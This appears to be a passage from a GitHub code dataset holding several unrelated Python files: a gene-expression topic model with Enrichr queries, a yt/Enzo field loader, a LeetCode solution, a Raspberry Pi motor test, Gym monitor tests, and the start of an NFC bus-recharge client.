GeneDevianceModel:\n\n def __init__(self, highly_variable):\n self.highly_variable = highly_variable\n\n def fit(self, y_ij):\n \n y_ij = y_ij[:, self.highly_variable]\n self.pi_j_hat = y_ij.sum(axis = 0)/y_ij.sum()\n\n return self\n\n def set_pi(self, pi):\n self.pi_j_hat = pi\n\n def transform(self, y_ij):\n \n y_ij = y_ij[:, self.highly_variable]\n \n n_i = y_ij.sum(axis = 1, keepdims = True)\n\n mu_ij_hat = n_i * self.pi_j_hat[np.newaxis, :]\n\n count_dif = n_i - y_ij\n expected_count_dif = n_i - mu_ij_hat\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n\n r_ij = np.multiply(\n np.sign(y_ij - mu_ij_hat), \n np.sqrt(\n np.where(y_ij > 0, 2 * np.multiply(y_ij, np.log(y_ij / mu_ij_hat)), 0) + \\\n 2 * np.multiply(count_dif, np.log(count_dif / expected_count_dif))\n )\n )\n\n return np.clip(np.nan_to_num(r_ij), -10, 10)\n\n\nclass ExpressionEncoder(nn.Module):\n\n def __init__(self, num_genes, num_topics, hidden, dropout, num_layers):\n super().__init__()\n output_batchnorm_size = 2*num_topics + 2\n\n self.num_topics = num_topics\n self.fc_layers = get_fc_stack(\n layer_dims = [num_genes + 1, *[hidden]*(num_layers-1), output_batchnorm_size],\n dropout = dropout, skip_nonlin = True\n )\n \n def forward(self, X):\n\n X = self.fc_layers(X)\n\n theta_loc = X[:, :self.num_topics]\n theta_scale = F.softplus(X[:, self.num_topics:(2*self.num_topics)])# + 1e-5\n\n rd_loc = X[:,-2].reshape((-1,1))\n rd_scale = F.softplus(X[:,-1]).reshape((-1,1))# + 1e-5\n\n return theta_loc, theta_scale, rd_loc, rd_scale\n\n\nclass ExpressionModel(BaseModel):\n '''\n Class\n '''\n \n def __init__(self, genes, highly_variable = None, num_modules = 15, decoder_dropout = 0.2, \n encoder_dropout = 0.1, hidden = 128, use_cuda = True, num_layers = 3, seed = None):\n '''\n Initialize ExpressionModel instance. 
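Only genes flagged as highly variable are used as encoder features, while the decoder models all genes, so the remaining genes can still be imputed.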
\n\n Example:\n\n >> genes[:3]\n ['GATA3', 'WNT3', 'CDK8']\n\n >> highly_variable[:3]\n np.array([True, False, False], dtype = bool)\n\n >> expr_model = ExpressionModel(genes, highly_variable = highly_variable, num_modules = 10)\n\n\n Args:\n genes (list, np.ndarray): Gene names / column names for count matrix, length must match dimension 2 of count matrix\n highly_variable (np.ndarray): boolean mask of same length as ``genes``. Genes flagged with ``True`` will be used as features for encoder. All genes will be used as features for decoder.\n This allows one to impute many genes while only learning modules on highly variable genes, decreasing model complexity and training time.\n num_modules (int): number of gene modules to find\n initial_counts (int): sparsity parameter, related to pseudocounts of dirichlet prior. Increasing will lead to denser cell latent variables, decreasing will lead to more sparse latent variables.\n dropout (float between 0,1): dropout rate for model.\n hidden (int): number of nodes in encoder hidden layers.\n use_cuda (bool): use CUDA to accelerate training on GPU (if GPU is available).\n\n Returns:\n ExpressionModel\n '''\n\n assert(isinstance(genes, (list, np.ndarray)))\n self.genes = np.ravel(np.array(genes))\n \n kwargs = dict(\n num_modules = num_modules,\n num_exog_features = len(self.genes),\n highly_variable = highly_variable,\n hidden = hidden,\n num_layers = num_layers,\n decoder_dropout = decoder_dropout,\n encoder_dropout = encoder_dropout,\n use_cuda = use_cuda,\n seed = seed,\n )\n \n super().__init__(ExpressionEncoder, Decoder, **kwargs)\n\n @scope(prefix= 'rna')\n def model(self, raw_expr, encoded_expr, read_depth, anneal_factor = 1.):\n\n pyro.module(\"decoder\", self.decoder)\n\n self.dispersion = pyro.param(\"dispersion\", torch.tensor(5.) 
* torch.ones(self.num_exog_features), \n constraint = constraints.positive).to(self.device)\n\n _alpha, _beta = self._get_gamma_parameters(self.I, self.num_topics)\n with pyro.plate(\"topics\", self.num_topics):\n initial_counts = pyro.sample(\"a\", dist.Gamma(self._to_tensor(_alpha), self._to_tensor(_beta)))\n\n theta_loc = self._get_prior_mu(initial_counts, self.K)\n theta_scale = self._get_prior_std(initial_counts, self.K)\n\n #print(theta_loc, theta_scale)\n \n with pyro.plate(\"cells\", encoded_expr.shape[0]):\n\n # Dirichlet prior 𝑝(𝜃|𝛼) is replaced by a log-normal distribution\n with poutine.scale(None, anneal_factor):\n theta = pyro.sample(\n \"theta\", dist.LogNormal(theta_loc, theta_scale).to_event(1))\n\n read_scale = pyro.sample('read_depth', dist.LogNormal(torch.log(read_depth), 1.).to_event(1))\n\n theta = theta/theta.sum(-1, keepdim = True)\n expr_rate = self.decoder(theta)\n\n mu = torch.multiply(read_scale, expr_rate)\n p = torch.minimum(mu / (mu + self.dispersion), self.max_prob)\n\n pyro.sample('obs', dist.NegativeBinomial(total_count = self.dispersion, probs = p).to_event(1), obs = raw_expr)\n\n @scope(prefix= 'rna')\n def guide(self, raw_expr, encoded_expr, read_depth, anneal_factor = 1.):\n\n pyro.module(\"encoder\", self.encoder)\n\n _counts_mu, _counts_var = self._get_lognormal_parameters_from_moments(*self._get_gamma_moments(self.I, self.num_topics))\n counts_mu = pyro.param('counts_mu', _counts_mu * encoded_expr.new_ones((self.num_topics,))).to(self.device)\n counts_std = pyro.param('counts_std', np.sqrt(_counts_var) * encoded_expr.new_ones((self.num_topics,)), \n constraint = constraints.positive).to(self.device)\n\n with pyro.plate(\"topics\", self.num_topics) as k:\n initial_counts = pyro.sample(\"a\", dist.LogNormal(counts_mu[k], counts_std[k]))\n\n \n with pyro.plate(\"cells\", encoded_expr.shape[0]):\n # Dirichlet prior 𝑝(𝜃|𝛼) is replaced by a log-normal distribution,\n # where μ and Σ are the encoder network outputs\n theta_loc, theta_scale, rd_loc, rd_scale = self.encoder(encoded_expr)\n\n with poutine.scale(None, anneal_factor):\n theta = pyro.sample(\n \"theta\", dist.LogNormal(theta_loc, theta_scale).to_event(1)\n )\n\n read_depth = pyro.sample(\n \"read_depth\", dist.LogNormal(rd_loc.reshape((-1,1)), rd_scale.reshape((-1,1))).to_event(1)\n )\n \n\n def _get_expression_distribution_parameters(self, raw_expr, batch_size = 32):\n \n def detach(x):\n return x.detach().cpu().numpy()\n\n X = self._validate_data(raw_expr)\n assert(isinstance(batch_size, int) and batch_size > 0)\n\n rd_locs, rd_scales, softmax_denoms = [], [], []\n for i,batch in enumerate(self._get_batches(X, batch_size = batch_size)):\n raw_expr, encoded_expr, read_depth = batch\n theta_loc, theta_scale, rd_loc, rd_scale = self.encoder(encoded_expr)\n\n rd_locs.append(detach(rd_loc))\n rd_scales.append(detach(rd_scale))\n\n theta = theta_loc.exp()/theta_loc.exp().sum(-1, keepdim = True)\n softmax_denoms.append(\n detach(self.decoder.get_softmax_denom(theta))\n )\n\n rd_loc = np.concatenate(rd_locs, 0)\n rd_scale = np.concatenate(rd_scales, 0)\n softmax_denom = np.concatenate(softmax_denoms, 0)\n return rd_loc, rd_scale, softmax_denom\n\n\n def _get_latent_MAP(self, raw_expr, encoded_expr, read_depth):\n theta_loc, theta_scale, rd_loc, rd_scale = self.encoder(encoded_expr)\n\n Z = theta_loc.cpu().detach().numpy()\n return np.exp(Z)/np.exp(Z).sum(-1, keepdims = True)\n\n\n def _get_batches(self, count_matrix, batch_size = 32, bar = False, training = True, desc = None):\n \n N = 
len(count_matrix)\n \n try:\n self.deviance_model\n except AttributeError:\n self.deviance_model = GeneDevianceModel(self.highly_variable).fit(count_matrix)\n\n for batch_start, batch_end in self._iterate_batch_idx(N, batch_size):\n yield self._featurize(count_matrix[batch_start : batch_end, :])\n\n def _validate_data(self, X):\n assert(isinstance(X, np.ndarray) or isspmatrix(X))\n \n if isspmatrix(X):\n X = np.array(X.todense())\n\n assert(len(X.shape) == 2)\n assert(X.shape[1] == self.num_exog_features)\n \n assert(np.isclose(X.astype(np.int64), X, 1e-1).all()), 'Input data must be raw transcript counts, represented as integers. Provided data contains non-integer values.'\n\n return X.astype(np.float32)\n\n def impute(self, latent_compositions):\n '''\n Compute imputed gene expression values using cells' latent variable representations.\n\n Args:\n latent_compositions (np.npdarray): Cells x num_modules array, each row must sum to 1\n\n Returns:\n (np.ndarray): imputed expression, Cells x num_genes matrix\n '''\n\n assert(isinstance(latent_compositions, np.ndarray))\n assert(len(latent_compositions.shape) == 2)\n assert(latent_compositions.shape[1] == self.num_topics)\n assert(np.isclose(latent_compositions.sum(-1), 1).all())\n\n latent_compositions = self._to_tensor(latent_compositions)\n\n return self.decoder(latent_compositions).cpu().detach().numpy()\n\n def _get_save_data(self):\n return dict(\n pi = self.deviance_model.pi_j_hat,\n **super()._get_save_data()\n )\n\n def _load_save_data(self, data):\n super()._load_save_data(data)\n\n self.deviance_model = GeneDevianceModel(self.highly_variable)\n self.deviance_model.set_pi(data['pi'])\n\n return self\n\n\n def _featurize(self, count_matrix):\n\n encoded_counts = self.deviance_model.transform(count_matrix)\n read_depth = count_matrix.sum(-1, keepdims = True)\n\n encoded_counts = np.hstack([encoded_counts, np.log(read_depth)])\n\n return self._to_tensor(count_matrix), self._to_tensor(encoded_counts), self._to_tensor(read_depth)\n\n def rank_genes(self, module_num):\n '''\n Ranks genes according to their activation in module ``module_num``. 
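(Scores are taken from the module's row of ``_score_features()``; for example, ``rank_genes(0)[-10:]`` would give the ten most-activated genes for module 0.) 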
Sorted from most suppressed to most activated.\n\n Args:\n module_num (int): For which module to rank genes\n\n Returns:\n np.ndarray: sorted array of gene names in order from most suppressed to most activated given the specified module\n '''\n assert(isinstance(module_num, int) and module_num < self.num_topics and module_num >= 0)\n\n return self.genes[np.argsort(self._score_features()[module_num, :])]\n\n def get_top_genes(self, module_num, top_n = None):\n '''\n For a module, return the top n genes that are most activated.\n\n Args:\n module_num (int): For which module to return most activated genes\n top_n (int): number of genes to return\n\n Returns\n (np.ndarray): Names of top n genes, sorted from least to most activated\n '''\n\n if top_n is None:\n top_genes_mask = self._score_features()[module_num,:] > 2\n\n if top_genes_mask.sum() > 200:\n return self.genes[top_genes_mask]\n else:\n top_n = 200\n\n assert(isinstance(top_n, int) and top_n > 0)\n return self.rank_genes(module_num)[-top_n : ]\n\n\n def rank_modules(self, gene):\n '''\n For a gene, rank how much its expression is activated by each module\n\n Args:\n gene (str): name of gene\n \n Raises:\n AssertionError: if ``gene`` is not in self.genes\n \n Returns:\n (list): of format [(module_num, activation), ...]\n '''\n \n assert(gene in self.genes)\n\n gene_idx = np.argwhere(self.genes == gene)[0]\n return list(sorted(zip(range(self.num_topics), self._score_features()[:, gene_idx]), key = lambda x : x[1]))\n \n\n def post_genelist(self, module_num, top_n = None):\n '''\n Post genelist to Enrichr, recieve genelist ID for later retreival.\n\n Args:\n module_num (int): which module's top genes to post\n top_n_genes (int): number of genes to post\n\n Returns:\n enrichr_id (str): unique ID of genelist for retreival with ``get_enrichments`` or ``get_ontology``\n '''\n\n top_genes = '\\n'.join(self.get_top_genes(module_num, top_n=top_n))\n\n enrichr_url = config.get('Enrichr','url')\n post_endpoint = config.get('Enrichr','post')\n\n payload = {\n 'list': (None, top_genes),\n }\n\n logger.info('Querying Enrichr with module {} genes.'.format(str(module_num)))\n response = requests.post(enrichr_url + post_endpoint, files=payload)\n if not response.ok:\n raise Exception('Error analyzing gene list')\n\n list_id = json.loads(response.text)['userListId']\n return list_id\n\n def get_ontology(self, list_id, ontology = 'WikiPathways_2019_Human'):\n '''\n Fetches the gene-set enrichments for a genelist in a certain ontology from Enrichr\n\n Args:\n list_id (str): unique ID of genelist from ``post_genelist``\n ontology (str, default = Wikipathways_2019_Human): For which ontology to download results\n\n Returns:\n (dict): enrichments, with format:\n\n {\n ontology: {\n rank : [...],\n term : [...],\n pvalue : [...],\n zscore : [...],\n combined_score : [...],\n genes : [...],\n adj_pvalue : [...]\n }\n\n }\n '''\n\n enrichr_url = config.get('Enrichr','url')\n get_endpoint = config.get('Enrichr','get').format(list_id = list_id, ontology = ontology)\n\n response = requests.get(enrichr_url + get_endpoint)\n if not response.ok:\n raise Exception('Error fetching enrichment results')\n \n data = json.loads(response.text)[ontology]\n\n headers = config.get('Enrichr','results_headers').split(',')\n \n return {ontology : [dict(zip(headers, x)) for x in data]}\n\n\n def get_enrichments(self, list_id, ontologies = config.get('Enrichr','ontologies').split(',')):\n '''\n Fetches the gene-set enrichments for a genelist from ontologies listed\n\n Args:\n 
list_id (str): unique ID of genelist from ``post_genelist``\n ontologies (list, default in kladi/matrix_models/config.ini): or which ontologies to download results\n\n Returns:\n (dict): enrichments, with format:\n\n {\n ontology: {\n rank : [...],\n term : [...],\n pvalue : [...],\n zscore : [...],\n combined_score : [...],\n genes : [...],\n adj_pvalue : [...]\n }\n ...\n }\n '''\n\n logger.info('Downloading results ...')\n\n enrichments = dict()\n for ontology in ontologies:\n enrichments.update(self.get_ontology(list_id, ontology=ontology))\n\n return enrichments\n\n @staticmethod\n def _enrichment_plot(ax, ontology, results,*,\n text_color, show_top, barcolor, show_genes, max_genes):\n\n terms, genes, pvals = [],[],[]\n for result in results[:show_top]:\n \n terms.append(\n compact_string(result['term'])\n ) \n genes.append(' '.join(result['genes'][:max_genes]))\n pvals.append(-np.log10(result['pvalue']))\n \n ax.barh(np.arange(len(terms)), pvals, color=barcolor)\n ax.set_yticks(np.arange(len(terms)))\n ax.set_yticklabels(terms)\n ax.invert_yaxis()\n ax.set(title = ontology, xlabel = '-log10 pvalue')\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.yaxis.set_ticks_position('left')\n ax.xaxis.set_ticks_position('bottom')\n \n if show_genes:\n for j, p in enumerate(ax.patches):\n _y = p.get_y() + p.get_height() - p.get_height()/3\n ax.text(0.1, _y, compact_string(genes[j], max_wordlen=10, join_spacer = ', '), ha=\"left\", color = text_color)\n\n\n def plot_enrichments(self, enrichment_results, show_genes = True, show_top = 5, barcolor = 'lightgrey',\n text_color = 'black', return_fig = False, enrichments_per_row = 2, height = 4, aspect = 2.5, max_genes = 15):\n '''\n Make plot of geneset enrichments given results from ``get_ontology`` or ``get_enrichments``.\n\n Example:\n\n post_id = expr_model.post_genelist(0) #post top 250 module 0 genes\n enrichments = expr_model.get_enrichments(post_id)\n expr_model.plot_enrichments(enrichments)\n\n Args:\n enrichment_results (dict): output from ``get_ontology`` or ``get_enrichments``\n show_genes (bool): overlay gene names on top of bars\n show_top (int): plot top n enrichment results\n barcolor (color): color of barplot bars\n text_color (text_color): color of text on barplot bars\n return_fig (bool): return fig and axes objects\n enrichments_per_row (int): number of plots per row\n height (float): height of each plot\n aspect (float): multiplier for width of each plot, width = aspect * height\n max_genes (int): maximum number of genes to display on bar\n\n Returns (if return_fig is True):\n matplotlib.figure, matplotlib.axes.Axes\n\n '''\n \n func = partial(self._enrichment_plot, text_color = text_color, \n show_top = show_top, barcolor = barcolor, show_genes = show_genes, max_genes = max_genes)\n\n fig, ax = map_plot(func, enrichment_results.keys(), enrichment_results.values(), plots_per_row = enrichments_per_row, \n height =height, aspect = aspect) \n \n plt.tight_layout()\n if return_fig:\n return fig, ax","repo_name":"AllenWLynch/Kladi","sub_path":"kladi/matrix_models/expression_model.py","file_name":"expression_model.py","file_ext":"py","file_size_in_byte":20162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7471928919","text":"from __future__ import print_function\nimport numpy as np\nimport yt\nimport powderday.config as cfg\n\nfrom yt.data_objects.particle_filters import add_particle_filter\n\n\ndef enzo_field_add(fname,ds = None, starages = 
False):\n\n def _starmetals(field,data):\n return data[('newstars','metallicity_fraction')]\n\n def _starcoordinates(field,data):\n #set units of cm then tack them back on because the column_stack loses them\n xpos = data[ ('newstars', 'particle_position_x')].in_units(\"cm\")\n ypos = data[ ('newstars', 'particle_position_y')].in_units(\"cm\")\n zpos = data[ ('newstars', 'particle_position_z')].in_units(\"cm\")\n coordinates = np.column_stack((xpos,ypos,zpos))\n coordinates = data.ds.arr(coordinates,\"cm\")\n return coordinates\n\n def _stellarages(field,data):\n age = ds.current_time.in_units('Gyr')-data[('newstars', 'creation_time')].in_units('Gyr')\n age[np.where(age < 1.e-3)[0]] = 1.e-3\n return age\n\n def _starmasses(field,data):\n return data[('newstars', 'particle_mass')]\n\n def _gasdensity(field,data):\n return data[('gas', 'density')]\n \n def _gasmetals(field,data):\n return data[ ('gas', 'metallicity')]\n\n def _gasmasses(field,data):\n return data[('gas','cell_mass')]\n\n def _gasfh2(field, data):\n try: return data[('gas', 'FractionH2')]\n except: return data[('gas', 'metallicity')]*0. #just some dimensionless array\n \n\n #load the ds\n if fname != None:\n ds = yt.load(fname)\n ds.index\n\n #set up particle_filters to figure out which particles are stars.\n #we'll call particles that have ages > 0 stars.\n\n def newstars(pfilter,data):\n age = data[pfilter.filtered_type,\"creation_time\"]\n filter = age.in_units('Gyr') > 0\n return filter\n\n\n \n add_particle_filter(\"newstars\",function=newstars,filtered_type='all',requires=[\"creation_time\"])\n ds.add_particle_filter(\"newstars\")\n ad = ds.all_data()\n\n\n\n\n ds.add_field(('star','metals'),function=_starmetals,units=\"code_metallicity\",sampling_type='particle')\n ds.add_field(('star','coordinates'),function=_starcoordinates,units=\"cm\",sampling_type='particle')\n ds.add_field(('stellar','ages'),function=_stellarages,units='Gyr',sampling_type='particle')\n ds.add_field(('star','masses'),function=_starmasses,units='g',sampling_type='particle')\n ds.add_field(('gas','density'),function=_gasdensity,units='g/cm**3',sampling_type='cell')\n ds.add_field(('gas','metals'),function=_gasmetals,units=\"code_metallicity\",sampling_type='cell')\n ds.add_field(('gas','fh2'),function=_gasfh2,units='dimensionless',sampling_type='cell')\n ds.add_field(('gas','masses'),function=_gasmasses,units='g',sampling_type='cell')\n \n ad = ds.all_data()\n\n return ds\n","repo_name":"dnarayanan/powderday","sub_path":"powderday/front_ends/enzo2pd.py","file_name":"enzo2pd.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"12615235725","text":"class Solution:\n def maxArea(self, height: List[int]) -> int:\n lp = 0\n rp = len(height) - 1\n max_area = 0\n\n\n while lp < rp:\n left_height = height[lp]\n right_height = height[rp]\n width = rp - lp\n if left_height < right_height:\n area = left_height * width \n max_area = max(max_area, area)\n lp += 1\n elif left_height >= right_height:\n area = right_height * width\n max_area = max(max_area, area)\n rp -= 1\n return max_area\n \n\n ","repo_name":"Elliott-Chong/LeetCode","sub_path":"12-Container-With-Most-Water/solution-1.py","file_name":"solution-1.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"13504412445","text":"import time\nimport pigpio\nimport pygame\nfrom adafruit_servokit import 
ServoKit\n\npi = pigpio.pi()\n \npygame.init()\n \n# Loop until the user clicks the close button.\ndone = False\n \n# Used to manage how fast the screen updates\nclock = pygame.time.Clock()\n \n# Initialize the joysticks\nj = pygame.joystick.Joystick(0)\nj.init()\n\nkit = ServoKit(channels=8)\n\nmotor = 4\n\nwhile not done:\n # EVENT PROCESSING STEP\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n if event.type == pygame.JOYBUTTONDOWN:\n if j.get_button(8):\n pi.set_servo_pulsewidth(4, 1000) # off\n time.sleep(3) \n print(event.button)\n if j.get_button(9):\n pi.set_servo_pulsewidth(4, 1500) # 50% power\n time.sleep(3) \n print(event.button)\n if j.get_button(0):\n pi.set_servo_pulsewidth(4, 1800) # 80% power\n time.sleep(3) \n print(event.button)\n \n if j.get_axis(2):\n kit.servo[1].angle = 0 \n print(event.axis)\n if event.type == pygame.JOYBUTTONUP:\n print(\"Joystick button released.\")\n \n if event.type == pygame.JOYAXISMOTION:\n if j.get_axis(2):\n kit.servo[0].angle = 0 \n print(event.axis)\n if j.get_axis(2):\n kit.servo[0].angle = 0 \n print(event.axis)\npi.stop()\n","repo_name":"nigel-otieno/RPI_Plane-test","sub_path":"brushless_motor_test.py","file_name":"brushless_motor_test.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3869776640","text":"#!/usr/bin/python3\n\"\"\"\nnew Class that inherits from rectangle\n\"\"\"\nfrom models.rectangle import Rectangle\n\n\nclass Square(Rectangle):\n \"\"\"\n this inherits from rectangle\n \"\"\"\n def __init__(self, size, x=0, y=0, id=None):\n super().__init__(size, size, x, y, id)\n\n def __str__(s):\n return (\n f\"[Square] ({s.id}) {s.x}/{s.y} - {s.width}\"\n )\n\n @property\n def size(self):\n \"\"\"get size\"\"\"\n return self.width\n\n @size.setter\n def size(self, value):\n \"\"\"set size to width and height\"\"\"\n self.width = value\n self.height = value\n\n def update(self, *args, **kwargs):\n \"\"\"function to assing newly attrs\"\"\"\n i = 0\n if args is not None and len(args) != 0:\n for arg in args:\n if i == 0:\n self.id = arg\n if i == 1:\n self.size = arg\n if i == 2:\n self.x = arg\n if i == 3:\n self.y = arg\n i += 1\n else:\n if kwargs is not None and len(kwargs) != 0:\n for key, value in kwargs.items():\n if key == \"id\":\n self.id = value\n if key == \"size\":\n self.width = value\n if key == \"x\":\n self.x = value\n if key == \"y\":\n self.y = value\n\n def to_dictionary(self):\n \"\"\"__dict__ representation of Square\"\"\"\n return {\"id\": self.id, \"size\": self.width, \"x\": self.x, \"y\": self.y}\n","repo_name":"sanei1509/holbertonschool-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17133155291","text":"import glob\nimport os\n\nimport gym\nfrom gym import error, spaces\nfrom gym import monitoring\nfrom gym.monitoring import monitor\nfrom gym.monitoring.tests import helpers\n\nclass FakeEnv(gym.Env):\n def _render(self, close=True):\n raise RuntimeError('Raising')\n\ndef test_monitor_filename():\n with helpers.tempdir() as temp:\n env = gym.make('CartPole-v0')\n env.monitor.start(temp)\n env.monitor.close()\n\n manifests = glob.glob(os.path.join(temp, '*.manifest.*'))\n assert len(manifests) == 1\n\ndef test_write_upon_reset_false():\n with helpers.tempdir() 
as temp:\n env = gym.make('CartPole-v0')\n env.monitor.start(temp, video_callable=False, write_upon_reset=False)\n env.reset()\n\n files = glob.glob(os.path.join(temp, '*'))\n assert not files, \"Files: {}\".format(files)\n\n env.monitor.close()\n files = glob.glob(os.path.join(temp, '*'))\n assert len(files) > 0\n\ndef test_write_upon_reset_true():\n with helpers.tempdir() as temp:\n env = gym.make('CartPole-v0')\n env.monitor.start(temp, video_callable=False, write_upon_reset=True)\n env.reset()\n\n files = glob.glob(os.path.join(temp, '*'))\n assert len(files) > 0, \"Files: {}\".format(files)\n\n env.monitor.close()\n files = glob.glob(os.path.join(temp, '*'))\n assert len(files) > 0\n\ndef test_close_monitor():\n with helpers.tempdir() as temp:\n env = FakeEnv()\n env.monitor.start(temp)\n env.monitor.close()\n\n manifests = monitor.detect_training_manifests(temp)\n assert len(manifests) == 1\n\ndef test_video_callable_true_not_allowed():\n with helpers.tempdir() as temp:\n env = gym.make('CartPole-v0')\n try:\n env.monitor.start(temp, video_callable=True)\n except error.Error:\n pass\n else:\n assert False\n\ndef test_video_callable_false_does_not_record():\n with helpers.tempdir() as temp:\n env = gym.make('CartPole-v0')\n env.monitor.start(temp, video_callable=False)\n env.reset()\n env.monitor.close()\n results = monitoring.load_results(temp)\n assert len(results['videos']) == 0\n\ndef test_video_callable_records_videos():\n with helpers.tempdir() as temp:\n env = gym.make('CartPole-v0')\n env.monitor.start(temp)\n env.reset()\n env.monitor.close()\n results = monitoring.load_results(temp)\n assert len(results['videos']) == 1, \"Videos: {}\".format(results['videos'])\n\ndef test_env_reuse():\n with helpers.tempdir() as temp:\n env = gym.make('CartPole-v0')\n env.monitor.start(temp)\n env.monitor.close()\n\n env.monitor.start(temp, force=True)\n env.reset()\n env.step(env.action_space.sample())\n env.step(env.action_space.sample())\n env.monitor.close()\n\n results = monitor.load_results(temp)\n assert results['episode_lengths'] == [2], 'Results: {}'.format(results)\n\nclass AutoresetEnv(gym.Env):\n metadata = {'semantics.autoreset': True}\n\n def __init__(self):\n self.action_space = spaces.Discrete(1)\n self.observation_space = spaces.Discrete(1)\n\n def _reset(self):\n return 0\n\n def _step(self, action):\n return 0, 0, False, {}\n\ngym.envs.register(\n id='Autoreset-v0',\n entry_point='gym.monitoring.tests.test_monitor:AutoresetEnv',\n timestep_limit=2,\n)\ndef test_env_reuse():\n with helpers.tempdir() as temp:\n env = gym.make('Autoreset-v0')\n env.monitor.start(temp)\n\n env.reset()\n\n env.step(None)\n _, _, done, _ = env.step(None)\n assert done\n\n env.step(None)\n _, _, done, _ = env.step(None)\n assert done\n\ndef test_no_monitor_reset_unless_done():\n def assert_reset_raises(env):\n errored = False\n try:\n env.reset()\n except error.Error:\n errored = True\n assert errored, \"Env allowed a reset when it shouldn't have\"\n\n with helpers.tempdir() as temp:\n # Make sure we can reset as we please without monitor\n env = gym.make('CartPole-v0')\n env.reset()\n env.step(env.action_space.sample())\n env.step(env.action_space.sample())\n env.reset()\n\n # can reset once as soon as we start\n env.monitor.start(temp, video_callable=False)\n env.reset()\n assert_reset_raises(env)\n\n env.step(env.action_space.sample())\n env.step(env.action_space.sample())\n assert_reset_raises(env)\n\n # should allow resets after the episode is done\n d = False\n while not d:\n _, _, d, _ = 
env.step(env.action_space.sample())\n\n        env.reset()\n\n        env.step(env.action_space.sample())\n        assert_reset_raises(env)\n\n        env.monitor.close()\n\ndef test_only_complete_episodes_written():\n    with helpers.tempdir() as temp:\n        env = gym.make('CartPole-v0')\n\n        env.monitor.start(temp, video_callable=False)\n        env.reset()\n        d = False\n        while not d:\n            _, _, d, _ = env.step(env.action_space.sample())\n\n        env.reset()\n        env.step(env.action_space.sample())\n\n        env.monitor.close()\n\n        # Only 1 episode should be written\n        results = monitoring.load_results(temp)\n        assert len(results['episode_lengths']) == 1, \"Found {} episodes written; expecting 1\".format(len(results['episode_lengths']))\n","repo_name":"wyndwarrior/imitation_from_observation","sub_path":"gym/monitoring/tests/test_monitor.py","file_name":"test_monitor.py","file_ext":"py","file_size_in_byte":5451,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"72"} +{"seq_id":"23007908067","text":"\"\"\" \n\nMetrobus client server code \n\nThis module acts as a standalone client, querying the \nselected node for recharges. This runs on a Le Potato.\n\nDue to research purposes and hardware limitations, this server\nqueries the DTN CLIENT RECHARGE server for the addresses of the \navailable nodes. \n\nOnce it has that information, to check whether a node\nhas a specific recharge, the server uses it \nto query the INDIVIDUAL NODE AGENT SERVER directly. \n\nOnce queried, if there's a recharge, this server enables the\nRFID module to write the new recharge status to the tag. \n\n\"\"\"\n\n\nfrom flask import Flask, render_template, request\nimport requests\nimport json\nfrom uuid import uuid4\nimport os\nfrom flask_sock import Sock\n\nimport binascii\nimport time\n\nfrom pn532pi import Pn532, pn532\nfrom pn532pi import Pn532I2c\n\n#set the communication interface to I2C\nPN532_I2C = Pn532I2c(1)\nnfc = Pn532(PN532_I2C)\n\n\n#search for pn532 chipset\ndef setup():\n    print(\"-------Looking for PN532--------\")\n\n    nfc.begin()\n\n    versiondata = nfc.getFirmwareVersion()\n    if not versiondata:\n        print(\"Didn't find PN53x board\")\n        raise RuntimeError(\"Didn't find PN53x board\")  # halt\n\n    # Got ok data, print it out!\n    print(\"Found chip PN5 {:#x} Firmware ver. {:d}.{:d}\".format((versiondata >> 24) & 0xFF, (versiondata >> 16) & 0xFF,\n                                                                (versiondata >> 8) & 0xFF))\n\n    # configure board to read RFID tags\n    nfc.SAMConfig()\n\n\nDTN_CLIENT_RECHARGE_SERVER_ADDRESS = os.getenv(\n    \"DTN_CLIENT_RECHARGE_SERVER_ADDRESS\", \"http://localhost:3000\"\n)\n\n#performs the operation of writing and reading the data in the card\ndef loop():\n\n    # Wait for an ISO14443A type card (Mifare, etc.). When one is found\n    # 'uid' will be populated with the UID, and uidLength will indicate\n    # if the uid is 4 bytes (Mifare Classic) or 7 bytes (Mifare Ultralight)\n    success, uid = nfc.readPassiveTargetID(cardbaudrate=pn532.PN532_MIFARE_ISO14443A_106KBPS)\n\n    if (success):\n        # Display some basic information about the card\n        print(\"Found an ISO14443A card\")\n        print(\"UID Length: {:d}\".format(len(uid)))\n        print(\"UID Value: {}\".format(binascii.hexlify(uid)))\n\n        # Make sure this is a Mifare Classic card\n        if (len(uid) != 4):\n            print(\"Ooops ... 
this doesn't seem to be a Mifare Classic card!\")\n return\n\n # We probably have a Mifare Classic card ...\n print(\"Seems to be a Mifare Classic card (4 byte UID)\")\n\n\napp = Flask(__name__, template_folder=\".\")\nsock = Sock(app)\nsock.init_app(app)\n\n\navailableNodes = []\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n\ndef searchNodeByName(name, nodeSet):\n return [element for element in nodeSet if element[\"name\"] == name] or None\n\n\n@sock.route(\"/ws\")\ndef echo(sock):\n while True:\n data = json.loads(sock.receive())\n\n node = data[\"value\"]\n\n sock.send(\n json.dumps(\n {\n \"type\": \"status\",\n \"value\": \"Fetching the recharges in the selected Metro bus\",\n }\n )\n )\n\n ##fetch recharges from node\n nodeAgentServer = searchNodeByName(node, availableNodes)[0]\n\n recharges = requests.get(nodeAgentServer[\"agentIP\"] + \"/get-recharges\").json()\n\n sock.send(\n json.dumps(\n {\n \"type\": \"status\",\n \"value\": \"Please approach the card into the NFC device...\",\n }\n )\n )\n\n # wait for nfc reader to read\n\n time.sleep(2)\n\n sock.send(\n json.dumps(\n {\n \"type\": \"status\",\n \"value\": \"Updating balance in the card\",\n }\n )\n )\n\n time.sleep(1)\n\n sock.send(\n json.dumps(\n {\n 